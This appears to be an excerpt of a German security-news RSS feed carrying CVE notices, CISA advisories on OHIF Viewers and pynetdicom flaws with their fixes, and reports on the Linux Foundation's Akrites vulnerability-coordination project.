<description><![CDATA[A vulnerability was found in HCL Traveler for Microsoft Outlook up to 3.0.5. It has been classified as problematic. This vulnerability affects unknown code. Performing a manipulation results in use of unmaintained third party components. This vulnerability only affects products that are no longer...]]></description>
<link>https://tsecurity.de/de/3629908/sicherheitsluecken/cve-2023-37524-hcl-traveler-for-microsoft-outlook-up-to-305-unmaintained-third-party-components-kb0131418-euvd-2023-60599/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3629908/sicherheitsluecken/cve-2023-37524-hcl-traveler-for-microsoft-outlook-up-to-305-unmaintained-third-party-components-kb0131418-euvd-2023-60599/</guid>
<pubDate>Sat, 27 Jun 2026 19:09:32 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/hcl:traveler_for_microsoft_outlook">HCL Traveler for Microsoft Outlook up to 3.0.5</a>. It has been classified as <a href="https://vuldb.com/kb/risk">problematic</a>. This vulnerability affects unknown code. Performing a manipulation results in use of unmaintained third party components. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability is identified as <a href="https://vuldb.com/cve/CVE-2023-37524">CVE-2023-37524</a>. The attack is only possible with local access. There is not any exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[The "Akrites" vulnerability-mitigation project launches]]></title>
<description><![CDATA[The Linux Foundation, in a
letter co-signed by a large range of organizations and companies, has
announced the launch of "Akrites", a project to fast-track vulnerability
fixes into projects.


	As Akrites works upstream to fix projects at the source, we commit
	to support downstream efforts to se...]]></description>
<link>https://tsecurity.de/de/3627539/linux-tipps/the-akrites-vulnerability-mitigation-project-launches/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3627539/linux-tipps/the-akrites-vulnerability-mitigation-project-launches/</guid>
<pubDate>Fri, 26 Jun 2026 15:23:31 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The Linux Foundation, in <a href="https://akrites.org/letter/">a
letter</a> co-signed by a large range of organizations and companies, has
announced the launch of "Akrites", a project to fast-track vulnerability
fixes into projects.
<p>
</p><blockquote class="bq">
	As Akrites works upstream to fix projects at the source, we commit
	to support downstream efforts to secure critical infrastructure
	before it can be exploited. When patches are released to the
	public, adversaries are able to utilize AI to rapidly reverse
	engineer the underlying vulnerabilities, develop exploits, and
	launch attacks. The success of our efforts therefore will be
	measured in patch deployment, not publication. We will partner with
	critical infrastructure owners and operators, civil society
	efforts, and governments as they increase coordination to achieve
	these goals.
<p>
	Confidentiality is non-negotiable: An undisclosed flaw in a widely
	deployed package is, in effect, a weapon, and the program is built
	first to prevent leaks. Fixes flow back into each project's own
	home, working with the maintainers. The engineering resources and
	other capabilities provided by Akrites participants contribute to
	this effort. Additionally, when a critical package has no one
	maintaining it, Akrites will stand as the maintainer of last resort
	so a fix can still reach everyone in a timely fashion. We will also
	align with government efforts so that public and private defenders
	move together, rather than in a disjointed fashion.
</p></blockquote>]]></content:encoded>
</item>
<item>
<title><![CDATA[Linux Foundation Launches Akrites To Coordinate AI-Driven Open Source Security]]></title>
<description><![CDATA[BrianFagioli writes: The Linux Foundation has announced Akrites, a new initiative to coordinate vulnerability disclosure and remediation for critical open source software as AI dramatically speeds up vulnerability discovery. Founding members include AWS, Google, Microsoft, OpenAI, Red Hat, NVIDIA...]]></description>
<link>https://tsecurity.de/de/3625881/it-security-nachrichten/linux-foundation-launches-akrites-to-coordinate-ai-driven-open-source-security/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3625881/it-security-nachrichten/linux-foundation-launches-akrites-to-coordinate-ai-driven-open-source-security/</guid>
<pubDate>Thu, 25 Jun 2026 23:23:59 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[BrianFagioli writes: The Linux Foundation has announced Akrites, a new initiative to coordinate vulnerability disclosure and remediation for critical open source software as AI dramatically speeds up vulnerability discovery. Founding members include AWS, Google, Microsoft, OpenAI, Red Hat, NVIDIA, IBM, Cisco, JPMorganChase, and others. Akrites will provide a shared Security Incident Response Team (SIRT), a standardized coordinated vulnerability disclosure process, and act as a "maintainer of last resort" for abandoned but widely used packages.
 
The goal is to reduce duplicate reports, avoid conflicting patches, and help upstream maintainers address vulnerabilities before they can be exploited. As AI makes it easier to find security flaws, can a coordinated industry effort help protect open source, or does it risk giving large corporations too much influence over the ecosystem? "Akrites is the largest coordinated effort in history to create systems and deploy tooling that leverages the collective power of the community to make everyone safer," the Linux Foundation said in an open letter. "Akrites participants will contribute engineering resources; work to build and ship fixes; or fund the engineers who do. Some companies have contributed mightily already. The reality is, collectively, we need to contribute more."<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Linux+Foundation+Launches+Akrites+To+Coordinate+AI-Driven+Open+Source+Security%3A+https%3A%2F%2Flinux.slashdot.org%2Fstory%2F26%2F06%2F25%2F2031228%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Flinux.slashdot.org%2Fstory%2F26%2F06%2F25%2F2031228%2Flinux-foundation-launches-akrites-to-coordinate-ai-driven-open-source-security%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://linux.slashdot.org/story/26/06/25/2031228/linux-foundation-launches-akrites-to-coordinate-ai-driven-open-source-security?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[OHIF Viewers DICOM]]></title>
<description><![CDATA[View CSAF
Summary
Successful exploitation of this vulnerability in a custom integration version could allow an attacker to steal an authenticated clinician's token via a crafted link.
The following versions of OHIF Viewers DICOM are affected:

OHIF DICOM Web Viewer Framework]]></description>
<link>https://tsecurity.de/de/3625565/it-security-nachrichten/ohif-viewers-dicom/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3625565/it-security-nachrichten/ohif-viewers-dicom/</guid>
<pubDate>Thu, 25 Jun 2026 20:09:15 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsma-26-176-02.json"><strong>View CSAF</strong></a></p>
<h2>Summary</h2>
<p><strong>Successful exploitation of this vulnerability in a custom integration version could allow an attacker to steal an authenticated clinician's token via a crafted link.</strong></p>
<p>The following versions of OHIF Viewers DICOM are affected:</p>
<ul>
<li>OHIF DICOM Web Viewer Framework &lt;=v3.12.0</li>
</ul>
<div class="csaf-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS</th>
<th role="columnheader">Vendor</th>
<th role="columnheader">Equipment</th>
<th role="columnheader">Vulnerabilities</th>
</tr>
</thead>
<tbody>
<tr>
<td>v3 8.2</td>
<td>Open Health Imaging Foundation (OHIF)</td>
<td>OHIF Viewers DICOM</td>
<td>Server-Side Request Forgery (SSRF)</td>
</tr>
</tbody>
</table>
</div>
<h3>Background</h3>
<ul>
<li><strong>Critical Infrastructure Sectors: </strong>Healthcare and Public Health</li>
<li><strong>Countries/Areas Deployed: </strong>Worldwide</li>
<li><strong>Company Headquarters Location: </strong>United States</li>
</ul>
<hr>
<h2>Vulnerabilities</h2>
<div class="csaf-accordion">
<p><a class="csaf-accordion-toggle-all" href="https://www.cisa.gov/#">Expand All +</a></p>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-12473</a></h3>
<div class="csaf-accordion-content">
<p>Two data sources (DICOMWebProxy and DICOMJSON) shipped in the default configuration fetch an arbitrary URL parameter without validation. A global authentication service in OHIF automatically injects the authenticated user's OIDC Bearer token into the resulting requests, sending it to the attacker-controlled server. DICOMweb data sources are not impacted.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-12473">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>OHIF Viewers DICOM</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Open Health Imaging Foundation (OHIF)</div>
<div class="ics-version"><strong>Product Version:</strong><br>Open Health Imaging Foundation (OHIF) OHIF DICOM Web Viewer Framework: &lt;=v3.12.0</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>The maintainer has fixed the reported vulnerability and released version 3.12.2 (2026-05-18). The fix is located at OHIF/Viewers#5985 (master), OHIF/Viewers#5978 (release/3.12).</p>
<p><strong>Mitigation</strong><br>Users are recommended to upgrade to v3.12.2 or later. Operators who need dicomwebproxy or dicomjson in authenticated deployments must additionally configure the new dangerouslyAllowedOriginsForAuthenticatedEnvironments allowlist in app-config.js.</p>
<p><strong>Mitigation</strong><br>Users running OHIF with authentication should remove ALL unused DicomWebProxyDataSource and DicomJSONDataSource configurations from the configuration file they are deploying with.</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/918.html">CWE-918 Server-Side Request Forgery (SSRF)</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8.2</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N">CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N</a></td>
</tr>
<tr>
<td>4.0</td>
<td>8.3</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:L/VA:N/SC:H/SI:L/SA:N">CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:L/VA:N/SC:H/SI:L/SA:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
</div>
<hr>
<h2>Acknowledgments</h2>
<ul>
<li>Simon Weber and Volker Schönefeld of Machine Spirits UG reported this vulnerability to CISA</li>
</ul>
<hr>
<h2>Legal Notice and Terms of Use</h2>
<p>This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy &amp; Use policy (https://www.cisa.gov/privacy-policy).</p>
<hr>
<h2>Recommended Practices</h2>
<p>CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability.</p>
<p>Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet.</p>
<p>Locate control system networks and remote devices behind firewalls and isolating them from business networks.</p>
<p>When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as the connected devices.</p>
<p>CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.</p>
<p>CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.</p>
<p>CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.</p>
<p>Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.</p>
<p>Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.</p>
<p>CISA also recommends users take the following measures to protect themselves from social engineering attacks:</p>
<p>Do not click web links or open attachments in unsolicited email messages.</p>
<p>Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams.</p>
<p>Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks.</p>
<p>No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time.</p>
<hr>
<h2>Revision History</h2>
<ul>
<li><strong>Initial Release Date: </strong>2026-06-25</li>
</ul>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Date</th>
<th role="columnheader">Revision</th>
<th role="columnheader">Summary</th>
</tr>
</thead>
<tbody>
<tr>
<td>2026-06-25</td>
<td>1</td>
<td>Initial Publication</td>
</tr>
</tbody>
</table>
<hr>
<h2>Legal Notice and Terms of Use</h2>]]></content:encoded>
</item>
<item>
<title><![CDATA[pydicom pynetdicom Library]]></title>
<description><![CDATA[View CSAF
Summary
Successful exploitation of this vulnerability could allow an unauthenticated attacker to write to arbitrary file paths.
The following versions of pydicom pynetdicom Library are affected:

pynetdicom >=v1.0.0|]]></description>
<link>https://tsecurity.de/de/3625564/it-security-nachrichten/pydicom-pynetdicom-library/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3625564/it-security-nachrichten/pydicom-pynetdicom-library/</guid>
<pubDate>Thu, 25 Jun 2026 20:09:14 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsma-26-176-01.json"><strong>View CSAF</strong></a></p>
<h2>Summary</h2>
<p><strong>Successful exploitation of this vulnerability could allow an unauthenticated attacker to write to arbitrary file paths.</strong></p>
<p>The following versions of pydicom pynetdicom Library are affected:</p>
<ul>
<li>pynetdicom &gt;=v1.0.0|&lt;v3.0.4</li>
</ul>
<div class="csaf-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS</th>
<th role="columnheader">Vendor</th>
<th role="columnheader">Equipment</th>
<th role="columnheader">Vulnerabilities</th>
</tr>
</thead>
<tbody>
<tr>
<td>v3 9.1</td>
<td>pydicom</td>
<td>pydicom pynetdicom Library</td>
<td>Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')</td>
</tr>
</tbody>
</table>
</div>
<h3>Background</h3>
<ul>
<li><strong>Critical Infrastructure Sectors: </strong>Healthcare and Public Health</li>
<li><strong>Countries/Areas Deployed: </strong>Worldwide</li>
<li><strong>Company Headquarters Location: </strong>United States</li>
</ul>
<hr>
<h2>Vulnerabilities</h2>
<div class="csaf-accordion">
<p><a class="csaf-accordion-toggle-all" href="https://www.cisa.gov/#">Expand All +</a></p>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-56445</a></h3>
<div class="csaf-accordion-content">
<p>The qrscp application's C-STORE handler uses a specific instance from attacker-supplied DICOM datasets directly in os.path.join() without sanitization, allowing file writes to arbitrary paths.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-56445">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>pydicom pynetdicom Library</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>pydicom</div>
<div class="ics-version"><strong>Product Version:</strong><br>pydicom pynetdicom: &gt;=v1.0.0|&lt;v3.0.4</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>The maintainer of pynetdicom has not responded to requests to work with CISA to mitigate this vulnerability. For update information, refer to the github page https://github.com/pydicom/pynetdicom.<br><a href="https://github.com/pydicom/pynetdicom">https://github.com/pydicom/pynetdicom</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/22.html">CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>9.1</td>
<td>CRITICAL</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H</a></td>
</tr>
<tr>
<td>4.0</td>
<td>8.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N">CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
</div>
<hr>
<h2>Acknowledgments</h2>
<ul>
<li>Simon Weber and Volker Schönefeld of Machine Spirits UG reported this vulnerability to CISA</li>
</ul>
<hr>
<h2>Legal Notice and Terms of Use</h2>
<p>This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy &amp; Use policy (https://www.cisa.gov/privacy-policy).</p>
<hr>
<h2>Recommended Practices</h2>
<p>CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability.</p>
<p>Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet.</p>
<p>Locate control system networks and remote devices behind firewalls and isolating them from business networks.</p>
<p>When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as the connected devices.</p>
<p>CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.</p>
<p>CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.</p>
<p>CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.</p>
<p>Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.</p>
<p>Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.</p>
<p>No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time.</p>
<hr>
<h2>Revision History</h2>
<ul>
<li><strong>Initial Release Date: </strong>2026-06-25</li>
</ul>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Date</th>
<th role="columnheader">Revision</th>
<th role="columnheader">Summary</th>
</tr>
</thead>
<tbody>
<tr>
<td>2026-06-25</td>
<td>1</td>
<td>Initial Publication</td>
</tr>
</tbody>
</table>
<hr>
<h2>Legal Notice and Terms of Use</h2>]]></content:encoded>
</item>
<item>
<title><![CDATA[pydicom pynetdicom Library]]></title>
<description><![CDATA[View CSAF
Summary
Successful exploitation of this vulnerability could allow an unauthenticated attacker to write to arbitrary file paths.
The following versions of pydicom pynetdicom Library are affected:

pynetdicom >=v1.0.0|]]></description>
<link>https://tsecurity.de/de/3625454/it-security-nachrichten/pydicom-pynetdicom-library/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3625454/it-security-nachrichten/pydicom-pynetdicom-library/</guid>
<pubDate>Thu, 25 Jun 2026 19:24:32 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsma-26-176-01.json"><strong>View CSAF</strong></a></p>
<h2>Summary</h2>
<p><strong>Successful exploitation of this vulnerability could allow an unauthenticated attacker to write to arbitrary file paths.</strong></p>
<p>The following versions of pydicom pynetdicom Library are affected:</p>
<ul>
<li>pynetdicom &gt;=v1.0.0|&lt;v3.0.4</li>
</ul>
<div class="csaf-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS</th>
<th role="columnheader">Vendor</th>
<th role="columnheader">Equipment</th>
<th role="columnheader">Vulnerabilities</th>
</tr>
</thead>
<tbody>
<tr>
<td>v3 9.1</td>
<td>pydicom</td>
<td>pydicom pynetdicom Library</td>
<td>Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')</td>
</tr>
</tbody>
</table>
</div>
<h3>Background</h3>
<ul>
<li><strong>Critical Infrastructure Sectors: </strong>Healthcare and Public Health</li>
<li><strong>Countries/Areas Deployed: </strong>Worldwide</li>
<li><strong>Company Headquarters Location: </strong>United States</li>
</ul>
<hr>
<h2>Vulnerabilities</h2>
<div class="csaf-accordion">
<p><a class="csaf-accordion-toggle-all" href="https://www.cisa.gov/#">Expand All +</a></p>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-56445</a></h3>
<div class="csaf-accordion-content">
<p>The qrscp application's C-STORE handler uses a specific instance from attacker-supplied DICOM datasets directly in os.path.join() without sanitization, allowing file writes to arbitrary paths.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-56445">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>pydicom pynetdicom Library</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>pydicom</div>
<div class="ics-version"><strong>Product Version:</strong><br>pydicom pynetdicom: &gt;=v1.0.0|&lt;v3.0.4</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>The maintainer of pynetdicom has not responded to requests to work with CISA to mitigate this vulnerability. For update information, refer to the github page https://github.com/pydicom/pynetdicom.<br><a href="https://github.com/pydicom/pynetdicom">https://github.com/pydicom/pynetdicom</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/22.html">CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>9.1</td>
<td>CRITICAL</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H</a></td>
</tr>
<tr>
<td>4.0</td>
<td>8.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N">CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
</div>
<hr>
<h2>Acknowledgments</h2>
<ul>
<li>Simon Weber and Volker Schönefeld of Machine Spirits UG reported this vulnerability to CISA</li>
</ul>
<hr>
<h2>Legal Notice and Terms of Use</h2>
<p>This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy &amp; Use policy (https://www.cisa.gov/privacy-policy).</p>
<hr>
<h2>Recommended Practices</h2>
<p>CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability.</p>
<p>Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet.</p>
<p>Locate control system networks and remote devices behind firewalls and isolating them from business networks.</p>
<p>When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as the connected devices.</p>
<p>CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.</p>
<p>CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.</p>
<p>CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.</p>
<p>Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.</p>
<p>Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.</p>
<p>No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time.</p>
<hr>
<h2>Revision History</h2>
<ul>
<li><strong>Initial Release Date: </strong>2026-06-25</li>
</ul>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Date</th>
<th role="columnheader">Revision</th>
<th role="columnheader">Summary</th>
</tr>
</thead>
<tbody>
<tr>
<td>2026-06-25</td>
<td>1</td>
<td>Initial Publication</td>
</tr>
</tbody>
</table>
<hr>
<h2>Legal Notice and Terms of Use</h2>]]></content:encoded>
</item>
<item>
<title><![CDATA[OHIF Viewers DICOM]]></title>
<description><![CDATA[View CSAF
Summary
Successful exploitation of this vulnerability in a custom integration version could allow an attacker to steal an authenticated clinician's token via a crafted link.
The following versions of OHIF Viewers DICOM are affected:

OHIF DICOM Web Viewer Framework]]></description>
<link>https://tsecurity.de/de/3625452/it-security-nachrichten/ohif-viewers-dicom/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3625452/it-security-nachrichten/ohif-viewers-dicom/</guid>
<pubDate>Thu, 25 Jun 2026 19:24:29 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsma-26-176-02.json"><strong>View CSAF</strong></a></p>
<h2>Summary</h2>
<p><strong>Successful exploitation of this vulnerability in a custom integration version could allow an attacker to steal an authenticated clinician's token via a crafted link.</strong></p>
<p>The following versions of OHIF Viewers DICOM are affected:</p>
<ul>
<li>OHIF DICOM Web Viewer Framework &lt;=v3.12.0</li>
</ul>
<div class="csaf-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS</th>
<th role="columnheader">Vendor</th>
<th role="columnheader">Equipment</th>
<th role="columnheader">Vulnerabilities</th>
</tr>
</thead>
<tbody>
<tr>
<td>v3 8.2</td>
<td>Open Health Imaging Foundation (OHIF)</td>
<td>OHIF Viewers DICOM</td>
<td>Server-Side Request Forgery (SSRF)</td>
</tr>
</tbody>
</table>
</div>
<h3>Background</h3>
<ul>
<li><strong>Critical Infrastructure Sectors: </strong>Healthcare and Public Health</li>
<li><strong>Countries/Areas Deployed: </strong>Worldwide</li>
<li><strong>Company Headquarters Location: </strong>United States</li>
</ul>
<hr>
<h2>Vulnerabilities</h2>
<div class="csaf-accordion">
<p><a class="csaf-accordion-toggle-all" href="https://www.cisa.gov/#">Expand All +</a></p>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-12473</a></h3>
<div class="csaf-accordion-content">
<p>Two data sources (DICOMWebProxy and DICOMJSON) shipped in the default configuration fetch an arbitrary URL parameter without validation. A global authentication service in OHIF automatically injects the authenticated user's OIDC Bearer token into the resulting requests, sending it to the attacker-controlled server. DICOMweb data sources are not impacted.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-12473">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>OHIF Viewers DICOM</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Open Health Imaging Foundation (OHIF)</div>
<div class="ics-version"><strong>Product Version:</strong><br>Open Health Imaging Foundation (OHIF) OHIF DICOM Web Viewer Framework: &lt;=v3.12.0</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>The maintainer has fixed the reported vulnerability and released version 3.12.2 (2026-05-18). The fix is located at OHIF/Viewers#5985 (master), OHIF/Viewers#5978 (release/3.12).</p>
<p><strong>Mitigation</strong><br>Users are recommended to upgrade to v3.12.2 or later. Operators who need dicomwebproxy or dicomjson in authenticated deployments must additionally configure the new dangerouslyAllowedOriginsForAuthenticatedEnvironments allowlist in app-config.js.</p>
<p><strong>Mitigation</strong><br>Users running OHIF with authentication should remove ALL unused DicomWebProxyDataSource and DicomJSONDataSource configurations from the configuration file they are deploying with.</p>
</div>
